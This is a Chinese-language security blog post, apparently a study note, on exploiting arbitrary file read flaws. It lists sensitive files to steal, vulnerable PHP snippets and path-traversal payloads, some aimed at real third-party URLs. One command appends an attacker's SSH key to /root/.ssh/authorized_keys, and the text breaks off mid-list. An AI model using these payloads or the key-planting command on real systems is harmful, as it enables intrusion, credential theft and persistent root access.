<!DOCTYPE html>



  


<html class="theme-next mist use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">
<script>
(function(){
 if(''){
 if (prompt('请输入文章密码') !== ''){
                 alert('密码错误！');
                                 history.back();
                                             
 }
         
 }
     
 })();
</script>


  
  
    
    
  <script src="/lib/pace/pace.min.js?v=1.0.2"></script>
  <link href="/lib/pace/pace-mac-osx.min.css?v=1.0.2" rel="stylesheet">







<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Hexo, NexT" />





  <link rel="alternate" href="/atom.xml" title="v1rus blog" type="application/atom+xml" />






<meta name="description" content="1. 利用指南基本思路就是尝试读取敏感文件以获取尽可能多的信息。比如， &#x2F;etc&#x2F;issue 可以确认 Linux 主机的发行版，其中 .bash_history, ssh相关路径 中可能含有大量敏感信息，获取到 &#x2F;etc&#x2F;shadow 则可以直接使用 John The Ripper 尝试枚举 root 密码。Tomcat 控制台可读取用户密码 &#x2F;usr&#x2F;local&#x2F;tomcat&#x2F;conf&#x2F;tom">
<meta property="og:type" content="article">
<meta property="og:title" content="任意文件读取&#x2F;1">
<meta property="og:url" content="https://virusday.github.io/2021/02/04/%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96/1/index.html">
<meta property="og:site_name" content="v1rus blog">
<meta property="og:description" content="1. 利用指南基本思路就是尝试读取敏感文件以获取尽可能多的信息。比如， &#x2F;etc&#x2F;issue 可以确认 Linux 主机的发行版，其中 .bash_history, ssh相关路径 中可能含有大量敏感信息，获取到 &#x2F;etc&#x2F;shadow 则可以直接使用 John The Ripper 尝试枚举 root 密码。Tomcat 控制台可读取用户密码 &#x2F;usr&#x2F;local&#x2F;tomcat&#x2F;conf&#x2F;tom">
<meta property="og:image" content="https://virusday.github.io/2021/02/04/%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96/1/image-20210224104440394.png">
<meta property="article:published_time" content="2021-02-04T07:39:21.049Z">
<meta property="article:modified_time" content="2021-02-24T03:26:15.562Z">
<meta property="article:author" content="Virusday">
<meta property="article:tag" content="Learn">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://virusday.github.io/2021/02/04/%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96/1/image-20210224104440394.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":true,"scrollpercent":true,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="https://virusday.github.io/2021/02/04/任意文件读取/1/"/>





  <title>任意文件读取/1 | v1rus blog</title>
  








<meta name="generator" content="Hexo 4.2.0"></head>
<script type="text/javascript" src="/lib/clipboard/clipboard.js"></script>
<script type="text/javascript" src="/js/src/custom.js"></script>
<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">v1rus blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">做些有意思的事</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br />
            
            搜索
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off"
             placeholder="搜索..." spellcheck="false"
             type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://virusday.github.io/2021/02/04/%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96/1/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Virusday">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/user.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="v1rus blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">任意文件读取/1</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2021-02-04T15:39:21+08:00">
                2021-02-04
              </time>
            

            
              <span class="post-meta-divider">|</span>
            

            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-check-o"></i>
              </span>
              
                <span class="post-meta-item-text">更新于&#58;</span>
              
              <time title="更新于" itemprop="dateModified" datetime="2021-02-24T11:26:15+08:00">
                2021-02-24
              </time>
            
          </span>

          

          
            
          

          
          

          

          
            <div class="post-wordcount">
              
                
                <span class="post-meta-item-icon">
                  <i class="fa fa-file-word-o"></i>
                </span>
                
                  <span class="post-meta-item-text">字数统计&#58;</span>
                
                <span title="字数统计">
                  3.1k
                </span>
              

              
                <span class="post-meta-divider">|</span>
              

              
                <span class="post-meta-item-icon">
                  <i class="fa fa-clock-o"></i>
                </span>
                
                  <span class="post-meta-item-text">阅读时长 &asymp;</span>
                
                <span title="阅读时长">
                  15
                </span>
              
            </div>
          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h1 id="1-利用指南"><a href="#1-利用指南" class="headerlink" title="1. 利用指南"></a>1. 利用指南</h1><p>基本思路就是尝试读取敏感文件以获取尽可能多的信息。<br>比如， <code>/etc/issue</code> 可以确认 Linux 主机的发行版，<br>其中 <code>.bash_history</code>, <code>ssh相关路径</code> 中可能含有大量敏感信息，<br>获取到 <code>/etc/shadow</code> 则可以直接使用 John The Ripper 尝试枚举 root 密码。<br>Tomcat 控制台可读取用户密码 <code>/usr/local/tomcat/conf/tomcat-users.xml</code>。</p>
<p>顺带提供了一些黑盒和白盒状态下挖掘此类漏洞的一些思路，主要以 PHP 为例。</p>
<p>高效利用字典<br><a href="https://github.com/ev0A/ArbitraryFileReadList" target="_blank" rel="noopener">https://github.com/ev0A/ArbitraryFileReadList</a></p>
<h2 id="1-1-判断系统类型-Linux的具体发行版"><a href="#1-1-判断系统类型-Linux的具体发行版" class="headerlink" title="1.1 判断系统类型 (Linux的具体发行版)"></a>1.1 判断系统类型 (Linux的具体发行版)</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">uname -a</span><br><span class="line">lsb_release -d</span><br><span class="line">cat &#x2F;etc&#x2F;issue</span><br><span class="line">cat &#x2F;etc&#x2F;os-release</span><br><span class="line">cat &#x2F;etc&#x2F;redhat-release</span><br><span class="line">cat &#x2F;etc&#x2F;debian_version</span><br><span class="line">cat &#x2F;etc&#x2F;slackware_version</span><br><span class="line">ls &#x2F;etc&#x2F;*version</span><br><span class="line">cat &#x2F;proc&#x2F;version</span><br><span class="line">cat &#x2F;proc&#x2F;cpuinfo</span><br></pre></td></tr></table></figure>

<h2 id="1-2-其他说明-服务器进程权限判断"><a href="#1-2-其他说明-服务器进程权限判断" class="headerlink" title="1.2 其他说明 (服务器进程权限判断)"></a>1.2 其他说明 (服务器进程权限判断)</h2><p>可以在本地构造虚拟机，搭建类似的环境，查看默认路径情况。</p>
<p><strong>服务器进程权限判断</strong><br>通过 <code>/etc/shadow</code>, <code>/proc/self/cwd</code> 能不能读到，可以判断进程的权限，可读(root)，不可读(非 root)</p>
<p><strong>其他</strong><br>有些文件需要高权限才能读取</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">&#96;.bash_history&#96; # 历史中可能带着用户的密码 (遇到过现实案例,是输错的情况下参数的,比如没输入 su 却以为自己输了 su)</span><br><span class="line"></span><br><span class="line">&#x2F;etc&#x2F;passwd # 用户情况</span><br><span class="line">&#x2F;etc&#x2F;shadow # 直接 John the Ripper</span><br><span class="line">&#x2F;usr&#x2F;local&#x2F;tomcat&#x2F;conf&#x2F;tomcat-users.xml # tomcat 用户配置文件</span><br><span class="line">&#x2F;etc&#x2F;hosts # 主机信息，通常配置了一些内网域名</span><br><span class="line">&#x2F;root&#x2F;.bashrc # 环境变量</span><br><span class="line">&#x2F;root&#x2F;.bash_history # 还有root外的其他用户</span><br><span class="line">&#x2F;root&#x2F;.viminfo # vim 信息</span><br><span class="line">&#x2F;root&#x2F;.ssh&#x2F;id_rsa # 拿私钥直接ssh</span><br><span class="line">&#x2F;proc&#x2F;xxxx&#x2F;cmdline # 进程状态枚举 xxxx 可以为0000-9999 使用burpsuite</span><br><span class="line">数据库 config 文件</span><br><span class="line">web 日志 access.log, error.log</span><br><span class="line">ssh 日志</span><br><span class="line">&#x2F;var&#x2F;lib&#x2F;php&#x2F;sess_PHPSESSID # 非常规问题 session 文件( 参考 平安科技的一道session包含 http:&#x2F;&#x2F;www.jianshu.com&#x2F;p&#x2F;2c24ea34566b)</span><br><span class="line"></span><br><span class="line"># 网络信息</span><br><span class="line">&#x2F;proc&#x2F;net&#x2F;arp</span><br><span class="line">&#x2F;proc&#x2F;net&#x2F;tcp</span><br><span class="line">&#x2F;proc&#x2F;net&#x2F;udp</span><br><span class="line">&#x2F;proc&#x2F;net&#x2F;dev</span><br></pre></td></tr></table></figure>

<h2 id="1-3-根据端口开放情况"><a href="#1-3-根据端口开放情况" class="headerlink" title="1.3 根据端口开放情况"></a>1.3 根据端口开放情况</h2><p>​    nmap扫描端口的开放情况 ，针对不同端口的情况，猜测出运行在端口上的服务信息。</p>
<p>端口 –&gt; 服务 –&gt; 配置文件信息。</p>
<p>举栗子说明：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">1、 宝塔8888端口，看看入口文件，如果入口隐藏了，读取配置文件路口的位置。&#x2F;www&#x2F;server&#x2F;panel&#x2F;data&#x2F;admin_path.pl 找到登录的路口</span><br><span class="line">2、 bt密码存储是以md5的形势放在SQLite里面: &#x2F;www&#x2F;server&#x2F;panel&#x2F;data&#x2F;default.db，用naticat读取数据库，得到登录的账号密码，然后去cmd5查一下</span><br></pre></td></tr></table></figure>



<h2 id="1-4-无痕反弹-shell"><a href="#1-4-无痕反弹-shell" class="headerlink" title="1.4 无痕反弹 shell"></a>1.4 无痕反弹 shell</h2><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">kill -9 $$</span><br></pre></td></tr></table></figure>

<h1 id="2-白盒测试"><a href="#2-白盒测试" class="headerlink" title="2. 白盒测试"></a>2. 白盒测试</h1><h2 id="2-1-常见代码最简化案例"><a href="#2-1-常见代码最简化案例" class="headerlink" title="2.1 常见代码最简化案例"></a>2.1 常见代码最简化案例</h2><p>以 PHP 为例</p>
<p>几个关键函数</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">file_get_content(<span class="string">"/etc/passwd"</span>)</span><br><span class="line"><span class="keyword">include</span>(<span class="string">"/etc/passwd"</span>)</span><br><span class="line">readfile(<span class="string">"etc/passwd"</span>)</span><br></pre></td></tr></table></figure>

<p>部分例子<br>file_get_contents</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">$filename =$_GET[<span class="string">'f'</span>];</span><br><span class="line"><span class="keyword">echo</span> file_get_contents($filename);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>readfile<br>这种方式会直下载</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">$filename =$_GET[<span class="string">'f'</span>];</span><br><span class="line">header(<span class="string">'Content-Type:image/gif'</span>);</span><br><span class="line">header(<span class="string">'Content-Disposition:attachment;filename='</span>.$filename);</span><br><span class="line">header(<span class="string">'Content-Length:'</span>.filesize($filename));</span><br><span class="line">readfile($filename);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<h2 id="2-2-白盒测试思路"><a href="#2-2-白盒测试思路" class="headerlink" title="2.2 白盒测试思路"></a>2.2 白盒测试思路</h2><p>代码审计<br>【白盒审计视角】WEB 安全系列之如何挖掘任意文件读取漏洞<br><a href="https://blog.csdn.net/cic10235/article/details/52052522" target="_blank" rel="noopener">https://blog.csdn.net/cic10235/article/details/52052522</a></p>
<h1 id="3-黑盒测试"><a href="#3-黑盒测试" class="headerlink" title="3. 黑盒测试"></a>3. 黑盒测试</h1><h2 id="3-1-黑盒测试的特征"><a href="#3-1-黑盒测试的特征" class="headerlink" title="3.1 黑盒测试的特征"></a>3.1 黑盒测试的特征</h2><p>通常出现在 文件上传/下载相关功能处。<br>从参数名称看，可能属于以下类型</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">&amp;RealPath&#x3D;</span><br><span class="line">&amp;FilePath&#x3D;</span><br><span class="line">&amp;ﬁlepath&#x3D;</span><br><span class="line">&amp;Path&#x3D;</span><br><span class="line">&amp;path&#x3D;</span><br><span class="line">&amp;inputFile&#x3D;</span><br><span class="line">&amp;url&#x3D;</span><br><span class="line">&amp;urls&#x3D;</span><br><span class="line">&amp;Lang&#x3D;</span><br><span class="line">&amp;dis&#x3D;</span><br><span class="line">&amp;data&#x3D;</span><br><span class="line">&amp;readﬁle&#x3D;</span><br><span class="line">&amp;ﬁlep&#x3D;</span><br><span class="line">&amp;src&#x3D;</span><br><span class="line">&amp;menu&#x3D;</span><br><span class="line">META-INF</span><br><span class="line">WEB-INF</span><br></pre></td></tr></table></figure>

<h2 id="3-2-判断类型"><a href="#3-2-判断类型" class="headerlink" title="3.2 判断类型"></a>3.2 判断类型</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">index.php?f&#x3D;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;etc&#x2F;passwd</span><br><span class="line">index.php?f&#x3D;..&#x2F;index.php</span><br><span class="line">index.php?f&#x3D;ﬁle:&#x2F;&#x2F;&#x2F;etc&#x2F;passwd</span><br></pre></td></tr></table></figure>

<p>注：当参数f的参数值为php文件时，若是文件被解析则是文件包含漏洞，若显示源码或提示下载则是文件查看与下载漏洞</p>
<h1 id="4-扫描器开发参考"><a href="#4-扫描器开发参考" class="headerlink" title="4. 扫描器开发参考"></a>4. 扫描器开发参考</h1><h2 id="4-1-payload-参考"><a href="#4-1-payload-参考" class="headerlink" title="4.1 payload 参考"></a>4.1 payload 参考</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;...:8080&#x2F;%c0%ae&#x2F;WEB-INF&#x2F;classes&#x2F;com&#x2F;huilan&#x2F;application&#x2F;action&#x2F;PeopleBankAction.class</span><br><span class="line"># 配合截断规则</span><br><span class="line">&#x2F;etc&#x2F;passwd%00.jpg </span><br><span class="line">..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;etc&#x2F;passwd%00.jpg</span><br><span class="line">http:&#x2F;&#x2F;www.zzvcom.com&#x2F;cms&#x2F;interface.jsp?time&#x3D;41&amp;data&#x3D;&#123;readfile:%27&#x2F;WEB-INF&#x2F;classes&#x2F;jdbc.properties%27&#125;&amp;jsoncallback&#x3D;jsonp1442909681355</span><br><span class="line">http:&#x2F;&#x2F;localhost:4848&#x2F;theme&#x2F;META-INF&#x2F;%c0%ae%c0%ae&#x2F;%c0%ae%c0%ae&#x2F;%c0%ae%c0%ae&#x2F;%c0%ae%c0%ae&#x2F;%c0%ae%c0%ae&#x2F;%c0%ae%c0%ae&#x2F;%c0%ae%c0%ae&#x2F;%c0%ae%c0%ae&#x2F;%c0%ae%c0%ae&#x2F;%c0%ae%c0%ae&#x2F;etc&#x2F;passwd</span><br><span class="line">http:&#x2F;&#x2F;www.intime.com.cn:8000&#x2F;..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c&#x2F;windows&#x2F;win.ini</span><br><span class="line">echo ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEA0jrJeJfEURdpG&#x2F;jddXzk3zZYxQfdHbgPC4QYh5qx0F2SS1Q+uCW6j2cM&#x2F;SxqhocfgDYw1CTikNTlJ43tzv1ozpSRjmLH26aTxGDUnXsvyVLeWdrjPni1FoVffW+LM0rZVh7A74Vi1bDr7IP7XjSMQU157rye7++G+eWA1NhscIiiJ&#x2F;pwUKAjPSiEx+8DXN8ccTDyWrSnD+NfUQXPO4dVFu2MR5&#x2F;VjLO2yWsVMwenCPwItf5xEwGqU5KbzxeTOyDnYYLk7UF6lBYpSDZC9U3mNL1alYgNnIbmZGYg921KFh28BRptDewh5MRDKmfMUSqeZpIZ95Pq8lG1sObcjNzDew&#x3D;&#x3D; root@szmlserver95_251.easou.com &gt;&gt; &#x2F;root&#x2F;.ssh&#x2F;authorized_keys</span><br></pre></td></tr></table></figure>



<h2 id="补充！"><a href="#补充！" class="headerlink" title="# 补充！"></a># 补充！</h2><p>​    这里我将最近看到的内容补充进来，对这些payload有一些解释。</p>
<p>首先第一点： %00截断。这个除了低版本php截断之外。这个在绕过以单纯的扩展名结尾，在windows上有独特的特性（经过实验），在burp中改包1.php%00.jpg。绕过上传之后windows对这个文件名的解析的特性会被解析成1.php。</p>
<p>第二点也是这几天看了很多资料才找到知识点，很多网上的教程知识对payload一贴而没有具体的解释，很多国外的文献翻译过来也只是解释为 <code>过长的utf-8 unicode编码</code>。这里首先需要有对unicode的补充，utf-8仅仅是unicode的一种实现形式，也是一种子集。通过1、2、3、4字节来表示一个字符。具体的链接：<a href="http://www.ruanyifeng.com/blog/2007/10/ascii_unicode_and_utf-8.html" target="_blank" rel="noopener">http://www.ruanyifeng.com/blog/2007/10/ascii_unicode_and_utf-8.html</a> 比较通俗易懂。</p>
<p>所以我们可以将<code>/</code>这个符号字节加长来绕过对unicode字集的判断。直接上图：</p>
<p><img src="/2021/02/04/%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96/1/image-20210224104440394.png" alt="image-20210224104440394"></p>
<p>重点是这句话：  <strong>The character “/“ can be represented in single-, double-, and triple-byte UTF-8 encoding formats as follows:</strong>  文章当中举的例子是iis的unicode的bug。</p>
<p>pl: 192.168.7.21/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+d:\ 绕过../的判断穿越web目录执行命令。<br>windows有时候目录穿越的符号是<code>\</code>，url编码是%5c 那么就是0101 1100。Unicode编码之后：1100 0001 1001 1100 就是%c1%9c。</p>
<p>漏洞的成因是因为：UTF-8编码规范规定:“UTF-8解码器<strong>不能接受长度超过编码字符所需的UTF-8序列</strong>。”任何过长的UTF-8序列都可能被滥用，以绕过只寻找最短编码的UTF-8子串测试。”IIS<strong>没有遵守这一准则</strong>，因此，这个漏洞允许成千上万的黑客在IIS服务器上运行任意命令。<strong>所以当路径参数出现unicode编码时，尤其在get方法的参数中（解码更容易利用），很有可能存在漏洞。</strong>utf-16就不详解了：点–&gt;%u002e 反斜杠–&gt;%u2215 正斜杠–&gt;%u2216。</p>
<p>第三点： 多重解码漏洞 “%25%32%66.” 代表“%2f”</p>
<p>参考链接： <a href="https://flylib.com/books/en/2.819.1.43/1/" target="_blank" rel="noopener">https://flylib.com/books/en/2.819.1.43/1/</a></p>
<h2 id="4-2-字典"><a href="#4-2-字典" class="headerlink" title="4.2 字典"></a>4.2 字典</h2><h3 id="4-2-1-关于字典各字段的简要说明"><a href="#4-2-1-关于字典各字段的简要说明" class="headerlink" title="4.2.1 关于字典各字段的简要说明"></a>4.2.1 关于字典各字段的简要说明</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">&#x2F;proc&#x2F;sched_debug # 提供cpu上正在运行的进程信息，可以获得进程的pid号，可以配合后面需要pid的利用</span><br><span class="line">&#x2F;proc&#x2F;mounts # 挂载的文件系统列表</span><br><span class="line">&#x2F;proc&#x2F;net&#x2F;arp # arp表，可以获得内网其他机器的地址</span><br><span class="line">&#x2F;proc&#x2F;net&#x2F;route # 路由表信息</span><br><span class="line">&#x2F;proc&#x2F;net&#x2F;tcp and &#x2F;proc&#x2F;net&#x2F;udp # 活动连接的信息</span><br><span class="line">&#x2F;proc&#x2F;net&#x2F;fib_trie # 路由缓存</span><br><span class="line">&#x2F;proc&#x2F;version  # 内核版本</span><br><span class="line">&#x2F;proc&#x2F;[PID]&#x2F;cmdline # 可能包含有用的路径信息</span><br><span class="line">&#x2F;proc&#x2F;[PID]&#x2F;environ #  程序运行的环境变量信息，可以用来包含getshell</span><br><span class="line">&#x2F;proc&#x2F;[PID]&#x2F;cwd     # 当前进程的工作目录</span><br><span class="line">&#x2F;proc&#x2F;[PID]&#x2F;fd&#x2F;[#] # 访问file descriptors，某写情况可以读取到进程正在使用的文件，比如access.log</span><br></pre></td></tr></table></figure>

<h2 id="4-2-2-字典内容"><a href="#4-2-2-字典内容" class="headerlink" title="4.2.2 字典内容"></a>4.2.2 字典内容</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br></pre></td><td class="code"><pre><span class="line">&#x2F;etc&#x2F;passwd  #看一下存在哪些用户和服务，如果某些用户有bash，可以读一下他的.bash_history</span><br><span class="line">&#x2F;etc&#x2F;shadow  #shadow文件，但是很难破解</span><br><span class="line">&#x2F;root&#x2F;.bash_history  #root用户操作历史命令记录，可能会泄露服务器根路径，mysql密码，一些服务启动脚本等</span><br><span class="line">&#x2F;root&#x2F;.mysql_history  #mysql历史命令记录文件</span><br><span class="line">&#x2F;var&#x2F;lib&#x2F;mlocate&#x2F;mlocate.db  #本地所有文件信息</span><br><span class="line">&#x2F;etc&#x2F;ssh&#x2F;sshd_config  #ssh配置文件，如果对外开放可看到端口</span><br><span class="line"></span><br><span class="line">apache：</span><br><span 